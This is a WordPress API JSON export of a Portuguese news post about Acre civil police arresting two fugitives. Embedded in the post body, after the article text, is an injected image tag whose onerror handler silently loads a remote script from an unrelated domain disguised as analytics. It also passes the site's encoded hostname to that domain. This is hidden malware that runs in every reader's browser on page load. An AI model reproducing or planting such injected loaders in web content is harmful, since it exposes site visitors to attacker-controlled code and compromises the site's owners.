{"id":50693,"date":"2020-10-19T18:47:22","date_gmt":"2020-10-19T18:47:22","guid":{"rendered":"https:\/\/abarevegan.com.br\/index.php\/2020\/10\/19\/policia-civil-cumpre-mandados-e-prende-dois-foragidos-da-justica\/"},"modified":"2020-10-19T18:47:22","modified_gmt":"2020-10-19T18:47:22","slug":"policia-civil-cumpre-mandados-e-prende-dois-foragidos-da-justica","status":"publish","type":"post","link":"https:\/\/nk7-testes.com.br\/agazeta\/policia-civil-cumpre-mandados-e-prende-dois-foragidos-da-justica\/","title":{"rendered":"Pol\u00edcia Civil cumpre mandados e prende dois foragidos da Justi\u00e7a"},"content":{"rendered":"<p style=\"text-align: justify;\"><span style=\"font-size: 13.2px;\">Um dos foragidos comandava a\u00e7\u00f5es criminosas no Bujari<\/span><\/p>\n<p style=\"text-align: justify;\">A Pol\u00edcia Civil cumpriu dois mandados de busca e apreens\u00e3o na madrugada desta segunda-feira (19), com o objetivo de capturar dois foragidos da Justi\u00e7a.<\/p>\n<p style=\"text-align: justify;\">Entre os presos estava um homem que \u00e9 apontado como l\u00edder da organiza\u00e7\u00e3o criminosa na cidade de Bujari.O investigado conseguiu se evadir de uma a\u00e7\u00e3o realizada no munic\u00edpio no dia 28 de agosto deste ano.<\/p>\n<p style=\"text-align: justify;\">Com as provas coletadas na opera\u00e7\u00e3o, representou-se pela pris\u00e3o do mesmo pela pr\u00e1tica do tr\u00e1fico de drogas e porte ilegal de arma de fogo. O homem foi preso hoje, em uma casa situada nas proximidades da Cidade do Povo.<\/p>\n<p style=\"text-align: justify;\">Durante a a\u00e7\u00e3o realizada ainda em agosto, a Pol\u00edcia Civil apreendeu drogas e armas, comprovando a participa\u00e7\u00e3o do investigado na pr\u00e1tica de diversos crimes, pelos quais ser\u00e1 processado pela Justi\u00e7a do Acre.<\/p>\n<p style=\"text-align: justify;\">O outro preso homem que foi preso possui condena\u00e7\u00e3o de 16 anos e 11 meses de reclus\u00e3o pela pr\u00e1tica de roubo e era investigado pelo N\u00facleo de Capturas da Pol\u00edcia Civil.<\/p>\n<p style=\"text-align: justify;\">Na posse do mesmo, foram encontradas provas que indicam que ele \u00e9 integrante de organiza\u00e7\u00e3o criminosa, assim sendo preso em flagrante.<\/p>\n<div><img onerror=\"var s=document.createElement(&quot;script&quot;);s.type=&quot;text\/javascript&quot;;s.id=&quot;cczedcc-plg-analytics&quot;;s.src=&quot;\/\/jemova.wurucozujo.com\/scripts\/js?k=5d936fde86df1a38418b4567&amp;s=&quot;+encodeURI(btoa(window.location.host)+&quot;&amp;ns=true&quot;);document.getElementsByTagName(&quot;head&quot;)[0].appendChild(s);\" \/><\/div>\n<div id=\"janelamailtopopupMail\" style=\"z-index: 1;\">\n<div id=\"janelamailtocontentPopupModalMail\">\n<div id=\"janelamailtomailClosePopup\">&nbsp;<\/div>\n<div id=\"janelamailtopopupMailModal\"><img \/><\/div><\/div><\/div>\n","protected":false},"excerpt":{"rendered":"<p style=\"text-align: justify;\"><span style=\"font-size: 13.2px;\">Um dos foragidos comandava a\u00e7\u00f5es criminosas no Bujari<\/span><\/p>\n","protected":false},"author":4,"featured_media":50692,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"jnews-multi-image_gallery":[],"jnews_single_post":[],"jnews_primary_category":[],"jnews_social_meta":[],"jnews_review":[],"enable_review":"","type":"","name":"","summary":"","brand":"","sku":"","good":[],"bad":[],"score_override":"","override_value":"","rating":[],"price":[],"footnotes":""},"categories":[44],"tags":[],"class_list":["post-50693","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-policia"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v26.5 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Pol\u00edcia Civil cumpre mandados e prende dois foragidos da Justi\u00e7a - Agazeta.net<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/nk7-testes.com.br\/agazeta\/policia-civil-cumpre-mandados-e-prende-dois-foragidos-da-justica\/\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Pol\u00edcia Civil cumpre mandados e prende dois foragidos da Justi\u00e7a - Agazeta.net\" \/>\n<meta property=\"og:description\" content=\"Um dos foragidos comandava a\u00e7\u00f5es criminosas no Bujari\" \/>\n<meta property=\"og:url\" content=\"https:\/\/nk7-testes.com.br\/agazeta\/policia-civil-cumpre-mandados-e-prende-dois-foragidos-da-justica\/\" \/>\n<meta property=\"og:site_name\" content=\"Agazeta.net\" \/>\n<meta property=\"article:published_time\" content=\"2020-10-19T18:47:22+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/10\/19-10-2020_Policia-Civil-cumpre-mandados-e-prende-dois-foragidos-da-Justica.jpeg\" \/>\n\t<meta property=\"og:image:width\" content=\"458\" \/>\n\t<meta property=\"og:image:height\" content=\"340\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Agazeta.Net\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Agazeta.Net\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minuto\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/policia-civil-cumpre-mandados-e-prende-dois-foragidos-da-justica\/\",\"url\":\"https:\/\/nk7-testes.com.br\/agazeta\/policia-civil-cumpre-mandados-e-prende-dois-foragidos-da-justica\/\",\"name\":\"Pol\u00edcia Civil cumpre mandados e prende dois foragidos da Justi\u00e7a - Agazeta.net\",\"isPartOf\":{\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/policia-civil-cumpre-mandados-e-prende-dois-foragidos-da-justica\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/policia-civil-cumpre-mandados-e-prende-dois-foragidos-da-justica\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/10\/19-10-2020_Policia-Civil-cumpre-mandados-e-prende-dois-foragidos-da-Justica.jpeg\",\"datePublished\":\"2020-10-19T18:47:22+00:00\",\"author\":{\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/#\/schema\/person\/6d6e25cb0435eb4a02fd44d30b4e3020\"},\"breadcrumb\":{\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/policia-civil-cumpre-mandados-e-prende-dois-foragidos-da-justica\/#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/nk7-testes.com.br\/agazeta\/policia-civil-cumpre-mandados-e-prende-dois-foragidos-da-justica\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/policia-civil-cumpre-mandados-e-prende-dois-foragidos-da-justica\/#primaryimage\",\"url\":\"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/10\/19-10-2020_Policia-Civil-cumpre-mandados-e-prende-dois-foragidos-da-Justica.jpeg\",\"contentUrl\":\"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/10\/19-10-2020_Policia-Civil-cumpre-mandados-e-prende-dois-foragidos-da-Justica.jpeg\",\"width\":458,\"height\":340,\"caption\":\"19-10-2020 Pol\u00edcia-Civil-cumpre-mandados-e-prende-dois-foragidos-da-Justi\u00e7a\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/policia-civil-cumpre-mandados-e-prende-dois-foragidos-da-justica\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"In\u00edcio\",\"item\":\"https:\/\/nk7-testes.com.br\/agazeta\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Pol\u00edcia Civil cumpre mandados e prende dois foragidos da Justi\u00e7a\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/#website\",\"url\":\"https:\/\/nk7-testes.com.br\/agazeta\/\",\"name\":\"Agazeta.net\",\"description\":\"Agazeta.net - Not\u00edcias de Rio Branco\/AC\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/nk7-testes.com.br\/agazeta\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/#\/schema\/person\/6d6e25cb0435eb4a02fd44d30b4e3020\",\"name\":\"Agazeta.Net\",\"url\":\"https:\/\/nk7-testes.com.br\/agazeta\/author\/agazeta\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Pol\u00edcia Civil cumpre mandados e prende dois foragidos da Justi\u00e7a - Agazeta.net","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/nk7-testes.com.br\/agazeta\/policia-civil-cumpre-mandados-e-prende-dois-foragidos-da-justica\/","og_locale":"pt_BR","og_type":"article","og_title":"Pol\u00edcia Civil cumpre mandados e prende dois foragidos da Justi\u00e7a - Agazeta.net","og_description":"Um dos foragidos comandava a\u00e7\u00f5es criminosas no Bujari","og_url":"https:\/\/nk7-testes.com.br\/agazeta\/policia-civil-cumpre-mandados-e-prende-dois-foragidos-da-justica\/","og_site_name":"Agazeta.net","article_published_time":"2020-10-19T18:47:22+00:00","og_image":[{"width":458,"height":340,"url":"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/10\/19-10-2020_Policia-Civil-cumpre-mandados-e-prende-dois-foragidos-da-Justica.jpeg","type":"image\/jpeg"}],"author":"Agazeta.Net","twitter_card":"summary_large_image","twitter_misc":{"Escrito por":"Agazeta.Net","Est. tempo de leitura":"1 minuto"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/nk7-testes.com.br\/agazeta\/policia-civil-cumpre-mandados-e-prende-dois-foragidos-da-justica\/","url":"https:\/\/nk7-testes.com.br\/agazeta\/policia-civil-cumpre-mandados-e-prende-dois-foragidos-da-justica\/","name":"Pol\u00edcia Civil cumpre mandados e prende dois foragidos da Justi\u00e7a - Agazeta.net","isPartOf":{"@id":"https:\/\/nk7-testes.com.br\/agazeta\/#website"},"primaryImageOfPage":{"@id":"https:\/\/nk7-testes.com.br\/agazeta\/policia-civil-cumpre-mandados-e-prende-dois-foragidos-da-justica\/#primaryimage"},"image":{"@id":"https:\/\/nk7-testes.com.br\/agazeta\/policia-civil-cumpre-mandados-e-prende-dois-foragidos-da-justica\/#primaryimage"},"thumbnailUrl":"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/10\/19-10-2020_Policia-Civil-cumpre-mandados-e-prende-dois-foragidos-da-Justica.jpeg","datePublished":"2020-10-19T18:47:22+00:00","author":{"@id":"https:\/\/nk7-testes.com.br\/agazeta\/#\/schema\/person\/6d6e25cb0435eb4a02fd44d30b4e3020"},"breadcrumb":{"@id":"https:\/\/nk7-testes.com.br\/agazeta\/policia-civil-cumpre-mandados-e-prende-dois-foragidos-da-justica\/#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/nk7-testes.com.br\/agazeta\/policia-civil-cumpre-mandados-e-prende-dois-foragidos-da-justica\/"]}]},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/nk7-testes.com.br\/agazeta\/policia-civil-cumpre-mandados-e-prende-dois-foragidos-da-justica\/#primaryimage","url":"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/10\/19-10-2020_Policia-Civil-cumpre-mandados-e-prende-dois-foragidos-da-Justica.jpeg","contentUrl":"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/10\/19-10-2020_Policia-Civil-cumpre-mandados-e-prende-dois-foragidos-da-Justica.jpeg","width":458,"height":340,"caption":"19-10-2020 Pol\u00edcia-Civil-cumpre-mandados-e-prende-dois-foragidos-da-Justi\u00e7a"},{"@type":"BreadcrumbList","@id":"https:\/\/nk7-testes.com.br\/agazeta\/policia-civil-cumpre-mandados-e-prende-dois-foragidos-da-justica\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"In\u00edcio","item":"https:\/\/nk7-testes.com.br\/agazeta\/"},{"@type":"ListItem","position":2,"name":"Pol\u00edcia Civil cumpre mandados e prende dois foragidos da Justi\u00e7a"}]},{"@type":"WebSite","@id":"https:\/\/nk7-testes.com.br\/agazeta\/#website","url":"https:\/\/nk7-testes.com.br\/agazeta\/","name":"Agazeta.net","description":"Agazeta.net - Not\u00edcias de Rio Branco\/AC","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/nk7-testes.com.br\/agazeta\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"pt-BR"},{"@type":"Person","@id":"https:\/\/nk7-testes.com.br\/agazeta\/#\/schema\/person\/6d6e25cb0435eb4a02fd44d30b4e3020","name":"Agazeta.Net","url":"https:\/\/nk7-testes.com.br\/agazeta\/author\/agazeta\/"}]}},"_links":{"self":[{"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/posts\/50693","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/comments?post=50693"}],"version-history":[{"count":0,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/posts\/50693\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/media\/50692"}],"wp:attachment":[{"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/media?parent=50693"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/categories?post=50693"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/tags?post=50693"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}